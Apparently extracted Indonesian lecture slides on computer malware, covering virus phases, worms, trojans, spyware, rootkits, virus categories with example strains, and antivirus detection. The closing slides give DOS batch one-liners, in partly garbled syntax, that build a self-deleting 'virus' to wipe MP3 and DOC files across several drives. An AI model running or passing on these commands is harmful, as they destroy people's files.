semisal:tanggal yang ditentukan,kehadiran
program lain/dieksekusinya program lain, dsb.
Tidak semua virus melalui fase ini.
• Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengkopikan dirinya
kepada suatu program atau ke suatu tempat dari
media storage (baik hardisk, ram dsb). Setiap
program yang terinfeksi akan menjadi hasil
“klonning” virus tersebut (tergantung cara virus
tersebut menginfeksinya).
47. • Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga
di picu oleh beberapa kondisi seperti pada
Dormant phase.
• Execution phase ( Fase Eksekusi )
Pada Fase inilah virus yang telah aktif tadi akan
melakukan fungsinya. Seperti menghapus file,
menampilkan pesan-pesan, dsb.
49. Worm
Cacing computer atau juga di sebut worm (bahasa
Inggris: computer worm atau worm) dalam
keamanan komputer, adalah sebuah program
komputer yang dapat menggandakan dirinya secara
sendiri dalam sistem komputer. Sebuah worm dapat
menggandakan dirinya dengan memanfaatkan
jaringan (LAN/WAN/Internet) tanpa perlu campur
tangan dari user itu sendiri. Worm tidak seperti virus
komputer biasa, yang menggandakan dirinya dengan
cara menyisipkan program dirinya pada program yang
ada dalam komputer tersebut, tapi worm
memanfaatkan celah keamanaan yang memang
terbuka atau lebih dikenal dengan sebutan
vulnerability. Beberapa worm juga menghabiskan
bandwidth yang tersedia. Worm merupakan evolusi
dari virus komputer.
Worm - Menduplikatkan dirinya sendiri
pada harddisk. Ini membuat sumber daya komputer
(Harddisk) menjadi penuh akan worm itu.
50. Hanya ada satu cara untuk mengatasi worm
yaitu dengan menutup celah keamanan yang
terbuka tersebut, dengan cara meng-update
patch atau Service Pack dari operating sistem
yang digunakan dengan patch atau Service
Pack yang paling terbaru.
Virus komputer memang dapat menginfeksi
berkas-berkas dalam sebuah sistem komputer,
tapi worm dapat melakukannya dengan lebih
baik. Selain dapat menyebar dalam sebuah
sistem, worm juga dapat menyebar ke banyak
sistem melalui jaringan yang terhubung dengan
sistem yang terinfeksi. Beberapa worm, juga
dapat mencakup kode-kode virus yang dapat
merusak berkas, mencuri dokumen, e-mail, atau
melakukan hal lainnya yang merusak, atau
hanya menjadikan sistem terinfeksi tidak
berguna.
51. Beberapa contoh dari worm adalah sebagai berikut:
• ADMw0rm: Worm yang dapat melakukan
eksploitasi terhadap layanan jaringan Berkeley
Internet Name Domain (BIND), dengan melakukan
buffer-overflow.
• Code Red: Worm yang dapat melakukan eksploitasi
terhadap layanan Internet Information Services (IIS)
versi 4 dan versi 5, dengan melakukan serangan
buffer-overflow.
• LoveLetter: Worm yang menyebar dengan cara
mengirimkan dirinya melalui e-mail kepada semua
akun yang terdaftar dalam Address Book Microsoft
Outlook Express/daftar kontak dalam Microsoft
Outlook dengan cara menggunakan kode Visual
Basic Script (VBScript).
• Nimda
• SQL-Slammer
52. Trojan Horse
Trojan horse atau Kuda Troya atau yang lebih
dikenal sebagai Trojan dalam keamanan komputer
merujuk kepada sebuah bentuk perangkat lunak
yang mencurigakan (malicious software/malware)
yang dapat merusak sebuah sistem atau jaringan.
Tujuan dari Trojan adalah memperoleh informasi
dari target (password, kebiasaan user yang tercatat
dalam system log, data, dan lain-lain), dan
mengendalikan target (memperoleh hak akses
pada target).
Trojan
- Mengambil data pada komputer yang telah
terinfeksi dan mengirimkannya pada pembuat
trojan itu sendiri.
53. Cara Kerja:
Trojan berbeda dengan jenis perangkat
lunak mencurigakan lainnya seperti virus
komputer atau worm karena dua hal
berikut:
Trojan bersifat "stealth" (siluman dan tidak
terlihat) dalam operasinya dan seringkali
berbentuk seolah-olah program tersebut
merupakan program baik-baik, sementara
virus komputer atau worm bertindak lebih
agresif dengan merusak sistem atau
membuat sistem menjadi crash.
Trojan dikendalikan dari komputer lain
(komputer attacker).
54. Cara Penyebaran:
Penggunaan istilah Trojan atau Trojan
horse dimaksudkan untuk menyusupkan
kode-kode mencurigakan dan merusak di
dalam sebuah program baik-baik dan
berguna; seperti halnya dalam Perang
Troya, para prajurit Sparta bersembunyi di
dalam Kuda Troya yang ditujukan sebagai
pengabdian kepada Poseidon. Kuda Troya
tersebut menurut para petinggi Troya
dianggap tidak berbahaya, dan diizinkan
masuk ke dalam benteng Troya yang tidak
dapat ditembus oleh para prajurit Yunani
selama kurang lebih 10 tahun perang
Troya bergejolak
55. Kebanyakan Trojan saat ini berupa sebuah
berkas yang dapat dieksekusi (*.EXE atau
*.COM dalam sistem operasi Windows dan
DOS atau program dengan nama yang sering
dieksekusi dalam sistem operasi UNIX, seperti
ls, cat, dan lain-lain) yang dimasukkan ke dalam
sistem yang ditembus oleh seorang cracker
untuk mencuri data yang penting bagi pengguna
(password, data kartu kredit, dan lain-lain).
Trojan juga dapat menginfeksi sistem ketika
pengguna mengunduh aplikasi (seringnya
berupa game komputer) dari sumber yang tidak
dapat dipercayai dalam jaringan Internet.
Aplikasi-aplikasi tersebut dapat memiliki kode
Trojan yang diintegrasikan di dalam dirinya dan
mengizinkan seorang cracker untuk dapat
mengacak-acak sistem yang bersangkutan.
56. • Backdoor
- Hampir sama dengan trojan. Namun,
Backdoor bisanya menyerupai file yang baik-baik
saja. Misalnya game.
• Spyware
- Spyware merupakan turunan dari adware,
yang memantau kebiasaan pengguna dalam
melakukan penjelajahan Internet untuk
mendatangkan "segudang iklan" kepada
pengguna. Tetapi, karena adware kurang
begitu berbahaya (tidak melakukan
pencurian data), spyware melakukannya
dan mengirimkan hasil yang ia kumpulkan
kepada pembuatnya (adware umumnya
hanya mengirimkan data kepada
perusahaan marketing).
57. • Rogue
- merupakan program yang meniru
program antivirus dan menampilkan aktivitas
layaknya antivirus normal, dan memberikan
peringatan-peringatan palsu tentang adanya
virus. Tujuannya adalah agar pengguna
membeli dan mengaktivasi program antivirus
palsu itu dan mendatangkan uang bagi
pembuat virus rogue tersebut. Juga rogue
dapat membuka celah keamanan dalam
komputer guna mendatangkan virus lain.
• Rootkit
- Virus yang bekerja menyerupai kerja sistem
komputer yang biasa saja.
58. • Polymorphic virus
- Virus yang gemar berubah-ubah agar tidak
dapat terdeteksi.
• Metamorphic virus
- Virus yang mengubah pengkodeannya sendiri
agar lebih sulit dideteksi.
• Virus ponsel
- Virus yang berjalan di telepon seluler, dan
dapat menimbulkan berbagai macam efek,
mulai dari merusak telepon seluler, mencuri
data-data di dalam telepon seluler, sampai
membuat panggilan-panggilan diam-diam dan
menghabiskan pulsa pengguna telepon
seluler.
59. KATEGORI VIRUS KOMPUTER
• VIRUS MAKRO
Jenis Virus ini pasti sudah sangat sering kita
dengar. Virus ini ditulis dengan bahasa
pemrograman dari suatu aplikasi bukan dengan
bahasa pemrograman dari suatu Operating
System. Virus ini dapat berjalan apabila aplikasi
pembentuknya dapat berjalan dengan baik,
maksudnya jika komputer dengan OS Windows 7
dapat menjalankan aplikasi ms. words, maka virus
ini bekerja pada komputer bersistem operasi
Windows 7
60. Contoh virus:
- Variant W97M, misal W97M.Panther
Panjang 1234 bytes, akan menginfeksi
NORMAL.DOT dan menginfeksi
dokumen apabila dibuka.
- WM.Twno.A;TW, panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word
yang menggunakan bahasa
makro, biasanya berekstensi *.DOT
dan *.DOC, dll.
61. • VIRUS BOOT SECTOR
Virus Boot sector ini sudah umum sekali
menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau
menggantikan boot sector asli dengan
program booting virus. Sehingga saat
terjadi booting maka virus akan di load
kememori dan selanjutnya virus akan
mempunyai kemampuan mengendalikan
hardware standar(ex::monitor, printer dsb)
dan dari memori ini pula virus akan
menyebar keseluruh drive yang ada dan
terhubung kekomputer (ex: floopy, drive
lain selain drive c).
62. Contoh virus :
I. Varian virus wyx ex: wyx.C(B), menginfeksi boot
record dan floopy; panjang : 520 bytes,
karakteristik : memory resident dan terenkripsi.
II. Varian V-sign, menginfeksi master boot record;
panjang 520 bytes; karakteristik: menetap di
memori (memory resident), terenkripsi, dan
polymorphic)
III. Stoned.june 4th/ bloody, menginfeksi Master
boot record dan floopy; panjang 520 bytes;
karakteristik: menetap di memori (memory
resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer
melakukan booting sebanyak 128 kali.
63. • STEALTH VIRUS
Virus ini akan menguasai tabel tabel interupt
pada DOS yang sering kita kenal dengan
“Interrupt interceptor”. Virus ini
berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya
mereka tersembunyi sesuai namanya baik
secara penuh ataupun ukurannya. Contoh
virus :
- Yankee.XPEH.4928, menginfeksi file
*.COM dan *.EXE ; panjang 4298 bytes;
karakteristik: menetap di memori,
ukuran tersembunyi, memiliki pemicu.
64. - WXYC (yang termasuk kategori boot
record pun karena masuk kategri
stealth dimasukkan pula disini),
menginfeksi floopy an motherboot
record; panjang 520 bytes; menetap
di memori; ukuran dan virus
tersembunyi.
- Vmem(s), menginfeksi file file *.EXE,
*.SYS, dan *.COM; panjang fie 3275
bytes; karakteristik:menetap di
memori, ukuran tersembunyi, di
enkripsi dll.
65. • POLYMORPHIC VIRUS
Virus ini Dirancang buat mengecoh program
antivirus, artinya virus ini selalu berusaha
agar tidak dikenali oleh antivirus dengan
cara selalu merubah rubah strukturnya
setiap kali selesai menginfeksi file/program
lain. Contoh virus:
- Necropolis A/B, menginfeksi file *.EXE
dan *.COM; panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran
dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur.
66. - Nightfall, menginfeksi file *.EXE;
panjang file 4554 bytes; karakteristik :
menetap di memori, ukuran dan virus
tersembunyi,memiliki pemicu, terenkripsi
dan dapat berubah-ubah struktur dll.
• VIRUS FILE/PROGRAM
Virus ini menginfeksi file file yang dapat
dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun
*.COm biasanya juga hasil infeksi dari virus
ini dapat diketahui dengan berubahnya
ukuran file yang diserangnya.
67. • MULTI PARTITION VIRUS
Virus ini merupakan gabungan dari Virus
Boot sector dan Virus file: artinya pekerjaan
yang dilakukan berakibat dua, yaitu dia
dapat menginfeksi file-file *.EXE dan juga
menginfeksi Boot Sector.
68. Cara mengatasi
• Serangan virus dapat dicegah atau
ditanggulangi dengan menggunakan
Software antivirus.
• Jenis perangkat lunak ini dapat juga
mendeteksi dan menghapus virus
komputer.
• Virus komputer ini dapat dihapus dengan
basis data (database/ Signature-based
detection), heuristik, atau peringkat dari
program itu sendiri (Quantum).
69. • Pendeteksian dengan
menggunakan basis data virus
signature (virus signature database):
• Cara kerja antivirus ini merupakan
pendekatan yang banyak digunakan oleh
antivirus tradisional, yang mencari tanda-tanda
dari keberadaan dari virus dengan
menggunakan sebagian kecil dari kode
virus yang telah dianalisis oleh vendor
antivirus, dan telah dikatalogisasi sesuai
dengan jenisnya, ukurannya, daya
hancurnya dan beberapa kategori
lainnya.
70. • Pendeteksian dengan melihat cara bagaimana
virus bekerja: Cara kerja antivirus seperti ini
merupakan pendekatan yang baru yang dipinjam
dari teknologi yang diterapkan dalamIntrusion
Detection System (IDS).
• Cara ini sering disebut juga sebagai Behavior-blocking
detection. Cara ini menggunakan
policy (kebijakan) yang harus diterapkan untuk
mendeteksi keberadaan sebuah virus.
• Jika ada kelakuan perangkat lunak yang "tidak
wajar" menurut policy yang diterapkan, seperti
halnya perangkat lunak yang mencoba untuk
mengakses address book untuk mengirimkan e-mail
secara massal terhadap daftar e-mail yang
berada di dalam address book tersebut (cara ini
sering digunakan oleh virus untuk menularkan
virus melalui e-mail), maka antivirus akan
menghentikan proses yang dilakukan oleh
perangkat lunak tersebut.
71. Contoh Program Virus di DOS
Prompt
Yang perlu Anda ketikkan dalam DOS
adalah:
• echo for %%p in (C:hack) do del *.mp3
%0 %%p:>virusdot.bat
72. • Maka akan muncul seekor virus yang
bernama virus.dot dalam folder yang
aktif.
73. • virus bekerja dengan menghapus semua
file MP3 yang ada di dalamnya.
Termasuk virus itu sendiri
menghilangkan dirinya, untuk
menghapus jejak.
74. • Apabila dimodifikasi supaya virus
tersebut dapat menghapus dalam
semua drive, bentuk syntax-nya adalah:
• echo for %%p in (C D E F) do del
*.mp3 %0 %%p:>virusdot.bat
• Nanti, virus akan menyusup ke drive C,
D, E, dan F untuk menghapus file MP3.
75. • Apabila berniat jenis file tertentu,
katakanlah file dokumen (DOC), syntax-nya
menjadi:
• echo for %%p in (C D E F) do del
*.doc %0 %%p:>virusdot.bat